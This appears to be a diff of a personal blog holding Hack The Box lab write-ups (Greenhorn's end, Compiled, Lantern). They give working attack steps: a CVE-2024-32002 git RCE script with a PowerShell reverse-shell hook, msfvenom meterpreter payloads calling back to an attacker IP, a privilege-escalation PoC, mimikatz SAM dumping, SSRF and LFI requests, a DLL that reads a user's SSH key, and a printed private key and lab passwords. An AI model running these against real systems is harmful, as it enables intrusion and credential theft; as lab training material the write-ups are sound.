Well for scalation priveligies we download the file 'Using OpenVAS.pdf'
![Image](/assets/img/post/greenhorn/image-10.png)
Well, after hours of searching, i need download 2 tools
`pdfimages` from poppler-utils
`depix.py` from https://github.com/spipm/Depix
`pdfimages ./PDF OUTPUT`
![Image](/assets/img/post/greenhorn/image-11.png)
## Pixelized Screenshots
```zsh
python3 depix.py -p /path/of/openvas image -s /images/searchimages/debruinseq_notepad_windows10_CloseAndSpace.png -o out1.png
```
![Image](/assets/img/post/greenhorn/image-12.png)
And we got the password for root:
sidefromsidetheothersidesidefromsidetheotherside
![Image](/assets/img/post/greenhorn/image-13.png)
and login as root
![Image](/assets/img/post/greenhorn/image-14.png)

261
_posts/2024-01-14-compiled.md Normal file
View File

@ -0,0 +1,261 @@
---
title: HTB - Compiled
date: 2024-02-02 12:17:34 -0400
categories: [hackthebox , Compiled]
tags: [HackTheBox, CMS pluck, RCE, User-Agent]
image:
path: /assets/img/post/compiled/compiled-card.png
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
alt: Hack the Box - Compiled.
---
## Box Info
| Name | Compiled |
| :-------------------- | ---------------: |
| Release Date | 20 Jul, 2024 |
| OS | Windows |
| Rated Difficulty | Medium |
## **Enumeration**
Information gathering
Nmap
![Image](/assets/img/post/compiled/image.png)
http://compiled.htb:5000
We have a web what does a git clone of a repository and decompress it and save the link of the repository (git).
![Image](/assets/img/post/compiled/image-1.png)
The repository calculator tells us a version of git that runs the web.
http://compiled.htb:3000/richard/Calculator
![Image](/assets/img/post/compiled/image-2.png)
## CVE-2024-32002
[Resource For Create The Exploit](https://amalmurali.me/posts/git-rce/)
![Image](/assets/img/post/compiled/image-3.png)
In few words we need to create 2 empty repository that match with the names the repository and add the payload useing the [Reverse Shell Generator](https://www.revshells.com/) , the names of repo can you rename as `repo1` and `repo2` or wathever you want, just match with the script.
`git clone --recursive git@github.com:amalmurali47/git_rce.git`
```zsh
git config --global protocol.file.allow always
git config --global core.symlinks true
git config --global init.defaultBranch main
rm -rf nothing
rm -rf toSeeHere
git clone http://compiled.htb:3000/test/repo1.git
cd repo1
mkdir -p y/hooks
cat >y/hooks/post-checkout <<EOF
#!bin/sh.exe
powershell -e JABjAGw...
EOF
chmod +x y/hooks/post-checkout
git add y/hooks/post-checkout
git commit -m "post-checkout"
git push
cd ..
git clone http://compiled.htb:3000/test/repo2.git
cd repo2
git submodule add --name x/y "http://compiled.htb:3000/test/repo1.git" A/modules/x
git commit -m "add-submodule"
printf ".git" >dotgit.txt
git hash-object -w --stdin <dotgit.txt >dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" >index.info
git update-index --index-info <index.info
git commit -m "add-symlink"
git push
```
![Image](/assets/img/post/compiled/image-4.png)
`rlwrap nc -lvnp 9001` listening and wait a get the `reverse shell` as `Richard`
![Image](/assets/img/post/compiled/image-5.png)
Download gitea.db for get the `Emily password`
![Image](/assets/img/post/compiled/image-6.png)
## Crack password
Sha-256
```
Password: 12345678 (bruh)
```
This script i made with chatGPT for crack the password
![Image](/assets/img/post/compiled/image-7.png)
#### Script
```python
import hashlib
import binascii
def pbkdf2_hash(password, salt, iterations=50000, dklen=50):
hash_value = hashlib.pbkdf2_hmac(
'sha256',
password.encode('utf-8'),
salt,
iterations,
dklen
)
return hash_value
def find_matching_password(dictionary_file, target_hash, salt, iterations=50000, dklen=50):
target_hash_bytes = binascii.unhexlify(target_hash)
with open(dictionary_file, 'r', encoding='utf-8') as file:
for line in file:
password = line.strip()
hash_value = pbkdf2_hash(password, salt, iterations, dklen)
if hash_value == target_hash_bytes:
print(f"Found password: {password}")
return password
print("Password not found.")
return None
salt = binascii.unhexlify('227d873cca89103cd83a976bdac52486')
target_hash = '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16'
dictionary_file = '/usr/share/wordlists/rockyou.txt'
find_matching_password(dictionary_file, target_hash, salt)
```
### Login as Emily
Evil-winrm for login as Emily :
`sudo evil-winrm -i compiled.htb -u Emily -p '12345678'`
![Image](/assets/img/post/compiled/image-8.png)
upload a payload.exe with msfvenom:
```zsh
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.16.45 lport=9001 -f exe -o payload.exe
```
msfconsole for exploit the payload, this is just for execute some commands bc in evil-winrm i can't the machine is finicky.
### Reconossaince Windows
```bash
PS>
- whoami /priv
- $Credential.GetNetworkCredential().password
- net user Emily
- tasklist
- Get-Service
Upload to winPEAS.exe and execute with powershell
PS>./winPEAS.exe
```
## Privilege Escalation
#### WinPEAS.exe
![Image](/assets/img/post/compiled/image-9.png)
Searching in google i found this
![Image](/assets/img/post/compiled/image-10.png)
## CVE-2024-20656
<https://www.mdsec.co.uk/2024/01/cve-2024-20656-local-privilege-escalation-in-vsstandardcollectorservice150-service/>
*NFS is a protocol that allows us to access files over a network in a manner similar to how we access local storage, and its commonly used to share files between UNIX/Linux and Windows systems.*
VSStandarCollectorService150 is a diagnostics tools, which is part of the visual studio, creates drectories and files in `"C:\Windows\Temp"`{: .filepath} directory with insufficiently restrivice permissions.
theres a github with a poc for CVE-2024-20656 but we need to make certain modification on the project, and then compile it to an executable.
[CVE-2024-20656](https://github.com/Wh04m1001/CVE-2024-20656/tree/main/Expl)
![Image](/assets/img/post/compiled/image-11.png)
### Visual Studio
The modification we make it is:
```js
WCHAR cmd[] = L"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe";
```
![Image](/assets/img/post/compiled/image-12.png)
and below in the code called `void cb1()`
```js
CopyFile(L"c:\\users\\public\\payload2.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
```
Create a new payload with msfvenom for get the shell as Administrator.
```zsh
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.16.45 lport=9003 -f exe -o payload2.exe
```
You can put the paylaod/reverseShell there or make a path in `c:\windows\Temp`{: .filepath} and make a folder 'test' and inside upload a payload.exe for get shell as `NT/Authority System`
Create a new project using the Desktop Development C++ Kit and right click on 'Expl' Solution and then a box will appear with the add option and select the Existing Project.
tip: I missed hours why dont works the Expl.exe i found the "`Debug`" for compilated need to choose to "`Release`" for works the Expl.exe and get the reverse shell.
![Image](/assets/img/post/compiled/image-13.png)
Build Solution for compiling/building for get the ouput Expl.exe and upload via Evil-winrm
![Image](/assets/img/post/compiled/image-14.png)
For execute the Expl.exe we need to use RunasCs.exe via Evil-winrm but before to execute the expl.exe we go to generate a reverse shell with RunasCs.exe
```bash
./RunasCs.exe Emily 12345678 powershell.exe -r 10.10.16.45:9090
```
Instant we trying start the service "msiserivce".
```text
Shell with RunasCs.exe
PS>
net start msiservice
```
```text
Shell with Evil-winrm
PS>
./RunasCs.exe Emily 12345678 "C:\Users\Emily\Documents\Expl.exe"
```
With msfconsole listening get the shell as Administrator
![Image](/assets/img/post/compiled/image-15.png)
Rooted
We can upload mimikatz.exe for get the hash and login with evil-winrm
```bash
PS> mimikatz.exe
mimikatz#: lsadumo::sam
```
![Image](/assets/img/post/compiled/image-16.png)
![Image](/assets/img/post/compiled/image-17.png)

536
_posts/2024-08-23-lantern.md Normal file
View File

@ -0,0 +1,536 @@
---
title: HTB - Lantern
date: 2024-08-23 00:00:00 +8000
categories: [hackthebox , Compiled]
tags: [HackTheBox, SSRF, Skipper Proxy, Blazer, API, Decompile, DLL, File Disclosure, LFI, RCE, Procmon]
image:
path: /assets/img/post/Lantern/Lantern.png
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
alt: Hack the Box - Lantern.
---
## Box Info
| Name | Lantern |
| :-------------------- | ---------------: |
| Release Date | 23 Aug, 2024 |
| OS | Windows |
| Rated Difficulty | Hard |
```bash
$ sudo nmap -p- --open --min-rate 5000 -n -sS -vvv 10.10.11.29 -oG allPorts
[sudo] password for racc0x:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-20 13:25 EDT
Initiating Ping Scan at 13:25
Scanning 10.10.11.29 [4 ports]
Completed Ping Scan at 13:25, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:25
Scanning 10.10.11.29 [65535 ports]
Discovered open port 80/tcp on 10.10.11.29
Discovered open port 22/tcp on 10.10.11.29
Discovered open port 3000/tcp on 10.10.11.29
Completed SYN Stealth Scan at 13:25, 13.43s elapsed (65535 total ports)
Nmap scan report for 10.10.11.29
Host is up, received echo-reply ttl 63 (0.17s latency).
Scanned at 2024-08-20 13:25:24 EDT for 13s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
3000/tcp open ppp syn-ack ttl 63
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 80:c9:47:d5:89:f8:50:83:02:5e:fe:53:30:ac:2d:0e (ECDSA)
|_ 256 d4:22:cf:fe:b1:00:cb:eb:6d:dc:b2:b4:64:6b:9d:89 (ED25519)
80/tcp open http Skipper Proxy
|_http-title: Did not follow redirect to http://lantern.htb/
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Content-Length: 207
| Content-Type: text/html; charset=utf-8
| Date: Tue, 20 Aug 2024 17:26:17 GMT
| Server: Skipper Proxy
| <!doctype html>
| <html lang=en>
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Content-Length: 225
| Content-Type: text/html; charset=utf-8
| Date: Tue, 20 Aug 2024 17:26:11 GMT
| Location: http://lantern.htb/
| Server: Skipper Proxy
| <!doctype html>
| <html lang=en>
| <title>Redirecting...</title>
| <h1>Redirecting...</h1>
| <p>You should be redirected automatically to the target URL: <a href="http://lantern.htb/">http://lantern.htb/</a>. If not, click the link.
| HTTPOptions:
| HTTP/1.0 200 OK
| Allow: GET, OPTIONS, HEAD
| Content-Length: 0
| Content-Type: text/html; charset=utf-8
| Date: Tue, 20 Aug 2024 17:26:11 GMT
|_ Server: Skipper Proxy
|_http-server-header: Skipper Proxy
3000/tcp open ppp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 500 Internal Server Error
| Connection: close
| Content-Type: text/plain; charset=utf-8
| Date: Tue, 20 Aug 2024 17:26:16 GMT
| Server: Kestrel
| System.UriFormatException: Invalid URI: The hostname could not be parsed.
| System.Uri.CreateThis(String uri, Boolean dontEscape, UriKind uriKind, UriCreationOptions& creationOptions)
| System.Uri..ctor(String uriString, UriKind uriKind)
| Microsoft.AspNetCore.Components.NavigationManager.set_BaseUri(String value)
| Microsoft.AspNetCore.Components.NavigationManager.Initialize(String baseUri, String uri)
| Microsoft.AspNetCore.Components.Server.Circuits.RemoteNavigationManager.Initialize(String baseUri, String uri)
| Microsoft.AspNetCore.Mvc.ViewFeatures.StaticComponentRenderer.<InitializeStandardComponentServicesAsync>g__InitializeCore|5_0(HttpContext httpContext)
| Microsoft.AspNetCore.Mvc.ViewFeatures.StaticC
| HTTPOptions:
| HTTP/1.1 200 OK
| Content-Length: 0
| Connection: close
| Date: Tue, 20 Aug 2024 17:26:21 GMT
| Server: Kestrel
| Help:
| HTTP/1.1 400 Bad Request
| Content-Length: 0
| Connection: close
| Date: Tue, 20 Aug 2024 17:26:16 GMT
| Server: Kestrel
| RTSPRequest:
| HTTP/1.1 505 HTTP Version Not Supported
| Content-Length: 0
| Connection: close
| Date: Tue, 20 Aug 2024 17:26:22 GMT
| Server: Kestrel
| SSLSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Length: 0
| Connection: close
| Date: Tue, 20 Aug 2024 17:26:38 GMT
|_ Server: Kestrel
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
```
It is using an Ubuntu Jammy
![Image](../assets/img/post/Lantern/1.png)
**Web:**
At the bottom of the page, we find that we can upload a PDF file.
![Image](../assets/img/post/Lantern/2.png)
![Image](../assets/img/post/Lantern/3.png)
Web port 3000
Through port 3000, we have another page but for administrators
![Image](../assets/img/post/Lantern/image.png)
The web page is using blazor framework
![Image](../assets/img/post/Lantern/image-1.png)
Looking what it is blazor framework
![Image](../assets/img/post/Lantern/image-2.png)
http://lantern.htb:3000/Error
![Image](../assets/img/post/Lantern/image-3.png)
```bash
feroxbuster -u http://lantern.htb/
```
![Image](../assets/img/post/Lantern/image-4.png)
## CVE-2022-38580
https://www.exploit-db.com/exploits/51111
[CVE-2022-38580](https://www.exploit-db.com/exploits/51111).
![Image](../assets/img/post/Lantern/image-5.png)
Skipper Proxy is an open-source HTTP proxy designed to manage and route web traffic.
![alt text](../assets/img/post/Lantern/image-6.png)
## SSRF | Skipper Proxy
X-Skipper-Proxy: http://127.0.0.1:5000/
X-Skipper-Proxy: http://127.0.0.1:3000/
![alt text](../assets/img/post/Lantern/image-7.png)
We will target internal ports and see if we can get a response (200 OK).
![alt text](../assets/img/post/Lantern/image-8.png)
### EndPoints
```js
<script type="text/javascript">
(function (l) {
if (l.search[1] === '/') {
var decoded = l.search.slice(1).split('&').map(function (s) {
return s.replace(/~and~/g, '&')
}).join('?');
window.history.replaceState(null, null,
l.pathname.slice(0, -1) + decoded + l.hash
);
}
}(window.location))
</script>
<script>
var path = window.location.pathname.split('/');
var base = document.getElementsByTagName('base')[0];
if (window.location.host.includes('localhost')) {
base.setAttribute('href', '/');
} else if (path.length > 2) {
base.setAttribute('href', '/' + path[1] + '/');
} else if (path[path.length - 1].length != 0) {
window.location.replace(window.location.origin + window.location.pathname + '/' + window.location.search);
}
</script>
<link href="css/bootstrap/bootstrap.min.css" rel="stylesheet" />
<link href="css/app.css" rel="stylesheet" />
</head>
<body>
<div id="app">Loading...</div>
<div id="blazor-error-ui">
An unhandled error has occurred.
<a href="" class="reload">Reload</a>
<a class="dismiss">🗙</a>
</div>
<script src="_framework/blazor.webassembly.js"></script>
```
## Blazor Framework
```bash
<!--Blazor:{"sequence":1,"type":"server","prerenderId":"e8257d9551ad40e1a7ccdf4c47a26283","descriptor":"CfDJ8BUo1ePf0MxMocV2v0oTDZEwgRKevFE9FDWFo3Hoh\u002Bctlq06n97j8wSmwAUYH1IF2HZuCK6\u002BshII3spoGgE5IVxEDTXiVB\u002BA1rBDo\u002B8BB\u002B12\u002BjL7EcO6jaHC0CDRCckmtRhk5y\u002B/UK9iXSszEyylLY/js/yeVqNQSWhUXxJZmvUbQVjHPH3/905RVhci7a2y4a5p6zdP8MnwgxhVUSCDZsGEFFQnAF7D\u002BPKVcJMyo0qmeC0RXolHvW/77/evOaDqem\u002BygXua99Tey8h2f4LP7JV3Uum8bhtDhtCfnR\u002BLda\u002B9y3Ok5cyDR5vejvy7nuj5xJUdqTFZ0Lk7P42TVHR0Sb8FldpOkFzXJPeBfWy7LJPqEbtIH06HtukzxeYWChVm8c/Mm\u002BwoVm/KsoZ9MAKCPiDq6Q4uPEW1xeOpJ8cQOYh9"}--><!--Blazor:{"prerenderId":"e8257d9551ad40e1a7ccdf4c47a26283"}-->
```
Here we found another file interesting.
view-source:http://lantern.htb:3000/_framework/
![Image](../assets/img/post/Lantern/image-10.png)
view-source:http://lantern.htb:3000/_framework/blazor.server.js
![Image](../assets/img/post/Lantern/image-9.png)
![Image](../assets/img/post/Lantern/image-11.png)
```bash
GET /_framework/blazor.server.js HTTP/1.1
Host: lantern.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Skipper-Proxy: http://127.0.0.1:3000
Referer: http://lantern.htb/vacancies
Content-Type: multipart/form-data; boundary=---------------------------77018016341540896892659445340
Content-Length: 714
Origin: http://lantern.htb
Connection: keep-alive
```
We filter by the blazor word for know if there exist another file interesting.
![Image](../assets/img/post/Lantern/image-12.png)
I found 2 routes, of which blazor.boot.json contains paths to DLL files. We will try to access them and find something interesting.
`_framework/dotnet.wasm`
`_framework/blazor.boot.json`
![Image](../assets/img/post/Lantern/image-13.png)
## DLL
Radzen.Blazor.dll
InternaLantern.dll
![Image](../assets/img/post/Lantern/image-14.png)
```bash
GET /_framework/InternaLantern.dll HTTP/1.1
Host: lantern.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Skipper-Proxy: http://127.0.0.1:5000
Referer: http://lantern.htb/vacancies
Content-Type: multipart/form-data; boundary=---------------------------77018016341540896892659445340
Content-Length: 714
Origin: http://lantern.htb
Connection: keep-alive
```
For download the DLL's we can use curl:
```bash
curl -X GET "http://lantern.htb/_framework/InternaLantern.dll" -H "Host: lantern.htb" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" -H "X-Skipper-Proxy: http://127.0.0.1:5000" -H "Connection: close" --output internalantern.dll
```
And for decompile DLL's we can use:
**dnSpy** _Spoiler:_ We didn't get good results.
**dotPeek**
```bash
employee1.InternalInfo = Encoding.UTF8.GetString(Convert.FromBase64String("SGVhZCBvZiBzYWxlcyBkZXBhcnRtZW50LCBlbWVyZ2VuY3kgY29udGFjdDogKzQ0MTIzNDU2NzgsIGVtYWlsOiBqb2huLnNAZXhhbXBsZS5jb20="));
employee2.InternalInfo = Encoding.UTF8.GetString(Convert.FromBase64String("SFIsIGVtZXJnZW5jeSBjb250YWN0OiArNDQxMjM0NTY3OCwgZW1haWw6IGFubnkudEBleGFtcGxlLmNvbQ=="));
employee3.InternalInfo = Encoding.UTF8.GetString(Convert.FromBase64String("RnVsbFN0YWNrIGRldmVsb3BlciwgZW1lcmdlbmN5IGNvbnRhY3Q6ICs0NDEyMzQ1Njc4LCBlbWFpbDogY2F0aGVyaW5lLnJAZXhhbXBsZS5jb20="));
employee4.InternalInfo = Encoding.UTF8.GetString(Convert.FromBase64String("UFIsIGVtZXJnZW5jeSBjb250YWN0OiArNDQxMjM0NTY3OCwgZW1haWw6IGxhcmEuc0BleGFtcGxlLmNvbQ=="));
employee5.InternalInfo = Encoding.UTF8.GetString(Convert.FromBase64String("SnVuaW9yIC5ORVQgZGV2ZWxvcGVyLCBlbWVyZ2VuY3kgY29udGFjdDogKzQ0MTIzNDU2NzgsIGVtYWlsOiBsaWxhLnNAZXhhbXBsZS5jb20="));
employee6.InternalInfo = Encoding.UTF8.GetString(Convert.FromBase64String("U3lzdGVtIGFkbWluaXN0cmF0b3IsIEZpcnN0IGRheTogMjEvMS8yMDI0LCBJbml0aWFsIGNyZWRlbnRpYWxzIGFkbWluOkFKYkZBX1FAOTI1cDlhcCMyMi4gQXNrIHRvIGNoYW5nZSBhZnRlciBmaXJzdCBsb2dpbiE="));
```
Decode the string in base64 (_echo "" | base64 -d)
- Head of sales department, emergency contact: +4412345678, email: john.s@example.com
- HR, emergency contact: +4412345678, email: anny.t@example.com
- FullStack developer, emergency contact: +4412345678, email: catherine.r@example.com
- PR, emergency contact: +4412345678, email: lara.s@example.com
- PR, emergency contact: +4412345678, email: lara.s@example.com
- System administrator, First day: 21/1/2024, Initial credentials admin:AJbFA_Q@925p9ap#22 Ask to change after first login!
Login lantern.htb:3000 with the credentials `admin:AJbFA_Q@925p9ap#22`
![Image](../assets/img/post/Lantern/image-15.png)
There is a section where we can upload DLL files; at this point, what comes to mind is a potential RCE.
![Image](../assets/img/post/Lantern/image-16.png)
![Image](../assets/img/post/Lantern/image-17.png)
File Disclosure Vulnerability
![Image](../assets/img/post/Lantern/image-18.png)
![Image](../assets/img/post/Lantern/image-19.png)
## LFI
![Image](../assets/img/post/Lantern/image-20.png)
```bash
http://lantern.htb/PrivacyAndPolicy?lang=../../../../etc/resolv&ext=conf
```
![Image](../assets/img/post/Lantern/image-21.png)
http://lantern.htb/PrivacyAndPolicy?lang=../../../../&ext=./etc/passwd
![Image](../assets/img/post/Lantern/image-22.png)
**User:** `tomas`
## RCE | Insecure Deserialization | Blazor
Now we will intercept the request to see how it is sent to the server behind the scenes
![Image](../assets/img/post/Lantern/image-28.png)
It seems we can see the serialized information in JSON; to read it, we need to deserialize it. For that, we will use an extension in BurpSuite called BPB.
![Image](../assets/img/post/Lantern/image-23.png)
![Image](../assets/img/post/Lantern/image-24.png)
We need to upload a DLL file and see what we can do with the deserialized data. Once we upload the file and deserialize it, we can see that we can insert the name of our file in the path to execute it.
### Deserialize
![Image](../assets/img/post/Lantern/image-25.png)
### Serialize
![Image](../assets/img/post/Lantern/image-26.png)
Below you can see that can execute the test.dll file.
![Image](../assets/img/post/Lantern/image-27.png)
Now we a create and charge our dll file for show the id_rsa from user tomas.
```bash
sudo apt install dotnet-sdk-6.0
mkdir xpl_project && \
cd xpl_project && \
dotnet new classlib -n xpl
```
```powershell
using Microsoft.AspNetCore.Components;
using Microsoft.AspNetCore.Components.Rendering;
using System.IO;
namespace xpl
{
public class Component : ComponentBase
{
protected override void BuildRenderTree(RenderTreeBuilder builder)
{
base.BuildRenderTree(builder);
// Read private SSH key of user tomas
string file = File.ReadAllText("/home/tomas/.ssh/id_rsa");
builder.AddContent(0, file);
}
}
}
```
```bash
dotnet add package Microsoft.AspNetCore.Components --version 6.0.0 && \
dotnet add package Microsoft.AspNetCore.Components.Web --version 6.0.0
dotnet build -c release
We will find the xpl.dll file under path /xpl_project/xpl/bin/release/net6.0.
```
**We got the id_rsa:**
![Image](../assets/img/post/Lantern/image-29.png)
```
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
```
`/var/mail$ cat tomas`
![Image](../assets/img/post/Lantern/image-30.png)
`sudo -l`
![Image](../assets/img/post/Lantern/image-31.png)
## Procmon
**-p/--pids:** This option allows us to specify a list of Process IDs (PIDs) that we want to monitor. We can provide multiple PIDs by separating them with commas.
**-e/--events:** With this option, we can specify which system calls or events you want to monitor. Like the PIDs, these events can also be provided as a comma-separated list.
**-c/--collect [FILEPATH]:** This option starts procmon in headless mode, meaning it will run without a user interface and will collect data directly into a specified file. This is useful for automated or script-based monitoring.
**-f/--file FILEPATH:** This option allows us to open an existing procmon trace file. Its useful when we want to analyze previously collected data rather than monitoring processes in real time.
![Image](../assets/img/post/Lantern/proc1.png)
`run command: `ps -aux` | `ps -aux | grep automation` for to display information about the currently running processes.`
![Image](../assets/img/post/Lantern/proc2.png)
Now we can see the write operations performed by the process with the follow command:
`sudo /usr/bin/procmon -p [PID] -e write`
Wait for a few minutes, long enough for the program to write sufficient data, Press F6 to export logs and F9 to exit:
![Image](../assets/img/post/Lantern/proc3.png)
![Image](../assets/img/post/Lantern/proc4.png)
**Download db:**
```bash
scp -i id_rsa tomas@lantern.htb:/home/tomas/procmon_2024-
08-23_00:50:02.db lantern.db
```
Open db with Sqlite3:
`.tables`
`SELECT * FROM ebpf;`
![Image](../assets/img/post/Lantern/proc5.png)
`.output out.txt`
`SELECT hex(substr(arguments, 9, resultcode)) FROM ebpf WHERE resultcode > 0 ORDER BY timestamp;`
**Hexadecimal format**
[CyberChef](https://gchq.github.io/CyberChef/)
![Image](../assets/img/post/Lantern/proc6.png)
Or use this script for decode the hexadecimal format:
```python
import binascii
# Read the content from out.txt
with open('out.txt', 'r') as file:
hex_data = file.read().strip().replace('\n', '')
# Convert hex data to binary
binary_data = binascii.unhexlify(hex_data)
# Decode the binary data to a string
try:
decoded_string = binary_data.decode('utf-8', errors='replace')
except UnicodeDecodeError:
decoded_string = binary_data.decode('latin1', errors='replace')
print("Decoded Data:\n")
print(decoded_string)
```
![Image](../assets/img/post/Lantern/proc7.png)
We need to delete the duplicate letters.
![Image](../assets/img/post/Lantern/proc8.png)
![Image](../assets/img/post/Lantern/proc9.png)
Pwned!!

1956
